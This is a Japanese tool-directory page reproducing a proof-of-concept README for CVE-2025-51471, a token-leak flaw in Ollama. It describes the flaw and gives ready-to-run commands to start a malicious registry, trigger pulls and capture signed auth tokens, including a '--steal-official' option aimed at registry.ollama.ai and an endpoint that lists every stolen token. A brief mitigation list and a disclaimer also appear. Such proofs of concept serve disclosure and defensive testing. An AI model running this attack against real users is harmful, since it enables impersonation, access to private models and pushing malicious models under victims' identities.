Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-51471-POC — このPoCは教育目的および許可を得たセキュリティテスト目的のみに使用されます。所有していないシステムに対して使用しないでください。 | Kitploit
ツール/GitHubGitHub/ajtazer/cve-2025-51471-poc
脆弱性分析エクスプロイトウェブセキュリティ認証レッドチーミング
GitHubajtazer/cve-2025-51471-poc

CVE-2025-51471-POC

このPoCは教育目的および許可を得たセキュリティテスト目的のみに使用されます。所有していないシステムに対して使用しないでください。

リポジトリを見る
27ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2025-51471 - Ollama クロスドメイントークン漏えい PoC

CVE-2025-51471 Ollama CVSS

作者: ajtazer

🔥 概要

このリポジトリには、Ollama の全バージョン(最新版を含む)に影響する、クロスドメイン認証トークン漏えいの脆弱性 CVE-2025-51471 の Proof of Concept(PoC)が含まれています。

📋 脆弱性の説明

Ollama が 401 Unauthorized で応答する HTTPS サーバーからモデルをプルする際、WWW-Authenticate ヘッダーの realm URL が同じドメインに属するかどうかを検証せずに従います[...]

これにより、攻撃者は以下のことが可能になります:

  1. 悪意のある「レジストリ」サーバーをセットアップする
  2. ユーザーを騙してそのサーバーからモデルをプルさせる
  3. 攻撃者が制御するエンドポイントを指す WWW-Authenticate ヘッダーを含む 401 応答を返す
  4. Ollama は Ed25519 署名付き認証トークンを攻撃者に盲目的に送信する
  5. 攻撃者がトークンを取得する

影響

  • registry.ollama.ai 上のプライベートモデルにアクセスする
  • 被害者の ID で悪意のあるモデルをプッシュする
  • Ollama レジストリで被害者になりすます

🚀 クイックスタート

前提条件

  • Python 3.7+
  • Flask(pip install flask)
  • Ollama(任意のバージョン)

インストール

root@kitploit:~
git clone https://github.com/ajtazer/CVE-2025-51471-PoC.git
cd CVE-2025-51471-PoC
pip install flask

PoC の実行

  1. 悪意のあるレジストリサーバーを起動します(HTTP モード):
root@kitploit:~
python3 malicious_registry.py --no-ssl
  1. 別のターミナルで、Ollama が実行されていることを確認します:
root@kitploit:~
ollama serve
  1. 脆弱性を発動させます:
root@kitploit:~
# Using curl API
curl http://localhost:11434/api/pull -d '{"model": "localhost:8080/malicious/model", "insecure": true}'

# OR using ollama CLI
ollama pull --insecure localhost:8080/malicious/model
  1. サーバーのターミナルで取得されたトークンを確認します!

🎬 デモ(PoC ビデオ)

この PoC を短いビデオでデモしました。こちらからご覧いただけます:

YouTube — PoC デモ

注意(macOS HTTPS モード): HTTPS モードを使用する場合は、生成された証明書をキーチェーンに追加するか、--no-ssl を指定して HTTP モードを使用してください。

📖 使用オプション

root@kitploit:~
python3 malicious_registry.py [-h] [--port PORT] [--no-ssl] [--steal-official]

Options:
  --port, -p PORT       Port to listen on (default: 8080)
  --no-ssl              Use HTTP instead of HTTPS
  --steal-official, -s  Redirect to steal registry.ollama.ai tokens
  --no-verbose          Disable verbose output

🔧 API エンドポイント

EndpointDescription
/v2/*偽のレジストリエンドポイント(エクスプロイトを発動)
/v2/tokenトークン取得エンドポイント
/tokens

🛡️ 緩和策

  1. 信頼できるソースからのみモデルをプルする
  2. サードパーティのレジストリからモデルをプルする際は注意する
  3. 公式修正については PR #10750 を参照してください

📝 クレジット

  • 作者: ajtazer
  • 最初の研究者:
    • Mohammed Benhelli (@FuzzingLabs)
    • Patrick Ventuzelo (@FuzzingLabs)
    • Huntr レポート

⚠️ 免責事項

この PoC は教育目的および許可されたセキュリティテストのみを対象としています。所有していないシステムに対して使用しないでください。


❤️ を込めて Antigravity で作成

ツールをダウンロード
取得したすべてのトークンを表示(JSON)
/healthサーバーのヘルスチェック